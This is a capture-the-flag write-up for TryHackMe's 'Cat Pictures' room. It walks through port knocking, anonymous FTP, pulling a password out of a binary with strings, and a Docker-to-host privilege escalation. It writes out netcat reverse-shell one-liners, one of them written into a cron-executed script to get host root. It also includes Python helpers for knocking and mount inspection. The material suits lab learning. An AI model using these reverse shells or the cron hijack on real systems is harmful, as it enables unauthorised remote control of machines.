Cat Pictures — TryHackMe

https://tryhackme.com/room/catpictures

This is a write-up for TryHackMe's room Cat Pictures. We first need to find the port the web server is running on; browsing it gives a hint to perform port knocking. Then there is a bit of binary reversing, and finally a nice privilege escalation out of a Docker environment.

Let’s start with finding out what all services are running:

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.90.64

PORT     STATE    SERVICE
21/tcp   filtered ftp
22/tcp   open     ssh
2375/tcp filtered docker
4420/tcp open     nvm-express
8080/tcp open     http-proxy

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,2375,4420,8080 10.10.90.64

PORT     STATE    SERVICE      VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
| 256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_ 256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
2375/tcp filtered docker
4420/tcp open nvm-express?
| fingerprint-strings:
| DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| INTERNAL SHELL SERVICE
| please note: cd commands do not work at the moment, the developers are fixing it at the moment.
| ctrl-c
| Please enter password:
| Invalid password...
| Connection Closed
| NULL, RPCCheck:
| INTERNAL SHELL SERVICE
| please note: cd commands do not work at the moment, the developers are fixing it at the moment.
| ctrl-c
|_ Please enter password:
8080/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page

Note that the FTP port (21) is filtered, and so is 2375 (the Docker API). Port 4420 is not really NVMe over Fabrics (nmap only guessed that from the port number); the fingerprint strings show a custom, password-protected "INTERNAL SHELL SERVICE".

Web Server

Check out the web server running on port 8080. Browsing around we found a user comment at http://10.10.84.51:8080/viewtopic.php?f=2&t=2 which talks about knocking:

Web Page at port 8080

It looks as if we have been told to knock on the server using the given port sequence.

Port Knocking

Read up on port knocking and use the knock program to send the sequence:

knock 10.10.84.51 1111 2222 3333 4444 

Run this command a few times and then run the nmap scan again to see whether the results differ:

PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
2375/tcp filtered docker
4420/tcp open     nvm-express
8080/tcp open     http-proxy

Now the FTP port is in the OPEN state.
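The knock-then-check step above, as an added Python example (this is not code from the original write-up or from the knock tool): each port in the sequence gets one TCP connection attempt, which is all it takes to put a SYN on the wire for the knock daemon, and the target port is then probed to see whether the sequence opened it. The host, the sequence and the port to check are passed on the command line; the usage line uses the room's values, and the delay and timeout values are assumptions.

```python
import socket
import sys
import time


def is_open(host, port, timeout=2.0):
    """True if a TCP handshake to host:port completes within timeout."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def knock(host, sequence, delay=0.2, timeout=0.5):
    """Send one connection attempt (one SYN) to each port, in order.

    A knock daemon only watches for the SYNs, so the attempts are expected to
    be refused or to time out; what happened per port is returned for logging.
    """
    results = []
    for port in sequence:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
                outcome = "connected"   # something is actually listening there
            except ConnectionRefusedError:
                outcome = "refused"     # RST came back: closed port, SYN was seen
            except OSError:
                outcome = "no-answer"   # dropped/filtered, or the timeout expired
        results.append((port, outcome))
        time.sleep(delay)
    return results


def knock_and_check(host, sequence, target, attempts=3):
    """Repeat the sequence until the target port answers (the write-up ran knock a few times)."""
    for _ in range(attempts):
        knock(host, sequence)
        if is_open(host, target):
            return True
    return False


if __name__ == "__main__":
    # Usage: knock.py 10.10.84.51 21 1111 2222 3333 4444
    host = sys.argv[1]
    target = int(sys.argv[2])
    sequence = [int(p) for p in sys.argv[3:]]
    print("port %d open: %s" % (target, knock_and_check(host, sequence, target)))
```

A connect() attempt is used rather than a raw packet so the script needs no root and no scapy; the daemon sees the same SYN either way, and the per-port outcomes tell you whether the knock ports are filtered (no answer) or closed (refused), which is useful when a sequence silently fails.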

FTP

Connect to the FTP server using an anonymous login:

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.84.51
Connected to 10.10.84.51.
220 (vsFTPd 3.0.3)
Name (10.10.84.51:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 162 Apr 02 14:32 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 0.00 secs (676.0817 kB/s)
ftp> quit
221 Goodbye.

note.txt gives us a hint:

note.txt

SHELL

Connect to port 4420 using netcat and enter the password from the note:

shell

It looks like a very limited shell (as the banner warned, cd does not work). After looking around, use this one-liner, with a netcat listener on port 9999 on your own machine, to get a proper reverse shell; the FIFO carries the listener's input back into /bin/sh, whose stdout and stderr are piped out over the netcat connection:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc MY_IP 9999 >/tmp/f

and captured the reverse shell:

reverse shell

In the /home/catlover directory we found an executable, runme. Running it asks for a password:

runme

Copy the executable to our Kali machine using netcat to analyse it further (compare sha256sum on both sides afterwards to make sure the transfer was complete):

# Receiving side (Kali)
nc -l -p 8888 > runme
# Sending side (target)
nc 10.8.98.192 8888 < runme

Running strings on the binary shows a potential password sitting next to the password prompt; a password compared with strcmp against a literal is stored in the clear in .rodata:

strings runme
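What strings is doing here, as an added Python example (not code from the write-up or the room): runs of printable ASCII are pulled out of a binary, and every string mentioning "password" is printed with its neighbours, because compiled C keeps literals in source order, so a hard-coded password usually lands within a few entries of the prompt that asks for it. The SAMPLE_BINARY blob is constructed for the example and its password is made up; it is not the room's binary.

```python
import re


def extract_strings(data, min_len=4):
    """Return every run of >= min_len printable ASCII bytes, in file order
    (the same idea as `strings -n min_len`)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def password_context(strings, keyword="password", window=3):
    """For each string mentioning keyword, return it with `window` neighbours
    on each side; a literal password compared with strcmp is usually in there."""
    hits = []
    for i, s in enumerate(strings):
        if keyword in s.lower():
            lo, hi = max(0, i - window), min(len(strings), i + window + 1)
            hits.append(strings[lo:hi])
    return hits


# Constructed stand-in for runme: an ELF-looking header, some dynamic-linking
# symbols, a few opcode bytes and a .rodata-style run of literals.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8 + b"\x02\x00\x3e\x00"
    + b"/lib64/ld-linux-x86-64.so.2\x00"
    + b"puts\x00fgets\x00strcmp\x00__libc_start_main\x00"
    + b"\x48\x8d\x3d\x9b\x0e\x00\x00"
    + b"Please enter password: \x00"
    + b"s3cr3tp4ss_example\x00"          # made-up value, not the room's password
    + b"-----BEGIN OPENSSH PRIVATE KEY-----\x00"
    + b"Wrong password\x00"
    + b"GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0\x00"
)


if __name__ == "__main__":
    # Usage: strings_ctx.py runme   (falls back to the constructed sample)
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BINARY
    for ctx in password_context(extract_strings(data)):
        print("\n".join(ctx), end="\n\n")
```

If the password does not show up this way, the binary may build it at runtime or compare a hash; the next step is then ltrace (to watch strcmp/strncmp arguments) or a debugger, rather than longer string lists.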

Now run the executable and enter this password:

User Flag

We got an SSH private key. Copy it into a file, change its permissions to 600 (ssh refuses a key that is readable by others) and connect to the server as user catlover:

ssh -i id_rsa catlover@10.10.84.51
ssh using private key

We got our first flag at /root/flag.txt

flag.txt

Root Flag

It looks like we are inside a Docker container (the hostname in the prompt is a container ID). Let's run LinPEAS to find out how we can escalate our privileges. A strange directory shows up in the scan:

Investigating /opt/clean directory further shows a script:

root@7546fa2336d6:/# ls -lrt /opt/clean/
total 4
-rw-r--r-- 1 root root 27 May 1 00:20 clean.sh
root@7546fa2336d6:/#
root@7546fa2336d6:/# cat /opt/clean/clean.sh
#!/bin/bash
rm -rf /tmp/*
root@7546fa2336d6:/#

It cleans the /tmp directory, so /opt/clean/clean.sh is probably run by a cron job. Since we are already root in the container, the job worth targeting is one running outside it, on the host, which would mean this directory is shared with the host. To test this, we replace /opt/clean/clean.sh with another reverse shell and try to catch the callback on our side (keep a copy of the original, or append the payload instead of overwriting, so the job keeps working if the test fails):

root@7546fa2336d6:/# echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.98.192 7777 >/tmp/f" > /opt/clean/clean.sh

Start an nc listener on port 7777 on Kali and wait for the cron job to run:

Sure enough, after a while we got our shell, and since it did not come from inside the container, it is a root shell on the host. The root flag is at /root/root.txt.
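The check behind that guess, as an added Python example that is not part of the write-up: if a host cron job executes the script, the directory must be mounted into the container from the host, and /proc/self/mountinfo inside the container lists which paths are bind-mounted read-write from a real host filesystem rather than belonging to the overlay root or a kernel pseudo-fs. The SAMPLE_MOUNTINFO table is constructed for the example; the room's actual mount table is not shown in the write-up.

```python
PSEUDO_FS = {
    "overlay", "proc", "sysfs", "devpts", "mqueue", "cgroup", "cgroup2",
    "tmpfs", "devtmpfs", "securityfs", "debugfs", "tracefs", "nsfs",
}


def _unescape(path):
    """mountinfo escapes space, tab, newline and backslash as \\040 \\011 \\012 \\134."""
    for code in ("040", "011", "012", "134"):
        path = path.replace("\\" + code, chr(int(code, 8)))
    return path


def parse_mountinfo(text):
    """Parse /proc/self/mountinfo lines into dicts (field layout per proc(5))."""
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pre, _, post = line.partition(" - ")   # optional fields end at " - "
        f = pre.split()
        g = post.split()
        mounts.append({
            "root": _unescape(f[3]),           # path on the source fs that is mounted
            "mount_point": _unescape(f[4]),    # where it appears in this namespace
            "options": f[5].split(","),        # per-mount options (rw/ro, nosuid, ...)
            "fstype": g[0],
            "source": g[1],
        })
    return mounts


def host_backed_mounts(text):
    """Mounts backed by a real filesystem instead of the container overlay or a
    kernel pseudo-fs: files there are the host's own inodes, so a write from
    inside the container is seen by whatever reads that path on the host."""
    return [m for m in parse_mountinfo(text) if m["fstype"] not in PSEUDO_FS]


def writable_host_paths(text):
    """(mount point, host-side root) for host-backed mounts mounted read-write."""
    return [(m["mount_point"], m["root"])
            for m in host_backed_mounts(text) if "rw" in m["options"]]


# Constructed sample of a container's mount table (paths and IDs are made up).
SAMPLE_MOUNTINFO = """\
21 15 0:21 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/A:/var/lib/docker/overlay2/l/B
22 21 0:22 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
23 21 0:23 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
24 21 8:1 /var/lib/docker/containers/abc123/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw,data=ordered
25 21 8:1 /opt/clean /opt/clean rw,relatime - ext4 /dev/sda1 rw,data=ordered
26 21 8:1 /srv/shared\\040data /data ro,relatime - ext4 /dev/sda1 rw,data=ordered
"""


if __name__ == "__main__":
    # Run inside the container; the sample is used only if /proc is unreadable.
    try:
        text = open("/proc/self/mountinfo").read()
    except OSError:
        text = SAMPLE_MOUNTINFO
    for mount_point, root in writable_host_paths(text):
        print("%-20s <- host:%s" % (mount_point, root))
```

The host-side root column is the part that matters: it tells you which host path a cron entry would reference, and an rw bind mount of a directory that a root cron job executes from is exactly the setup that turns container root into host root. The read-only /data entry in the sample is listed by parse_mountinfo but dropped by writable_host_paths, since a ro mount cannot be used this way.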

This was a nice and easy room. I hope you enjoyed the write-up. Thanks for reading.
